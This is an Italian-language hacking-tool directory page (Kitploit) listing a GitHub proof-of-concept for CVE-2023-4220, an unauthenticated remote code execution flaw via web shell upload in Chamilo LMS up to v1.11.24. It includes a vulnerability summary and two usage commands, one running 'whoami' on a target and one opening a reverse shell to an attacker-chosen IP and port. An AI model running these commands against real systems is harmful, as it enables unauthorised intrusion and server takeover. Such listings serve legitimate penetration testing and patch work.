Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

POC per CVE-2023-4220 - Chamilo LMS Esecuzione di codice remoto non autenticata tramite upload di file grandi

Vedi Repository
1112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-4220 POC

Maggiori informazioni su CVE-2023-4220: StarLabs Advisory

Riepilogo

ProdottoChamilo
FornitoreChamilo
GravitàAlta - Gli avversari potrebbero sfruttare vulnerabilità software per ottenere esecuzione di codice remoto non autenticata.
Versioni interessate<= v1.11.24
Versioni testatev1.11.24 (versione più recente al momento della scrittura)
Identificativo CVECVE-2023-4220
Descrizione CVECaricamento senza restrizioni di file nella funzionalità di upload di file grandi in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e ottenere esecuzione di codice remoto tramite caricamento di web shell.
Classificazione CWECWE-434: Caricamento senza restrizioni di file con tipo pericoloso
Classificazione CAPECCAPEC-650: Caricamento di una Web Shell su un Server Web

Prova di concetto (PoC)

Esecuzione diretta di comandi

Per eseguire comandi direttamente, usa il seguente comando:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

Ottenere una reverse shell

Per ottenere una reverse shell, usa il seguente comando:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

Scarica lo strumento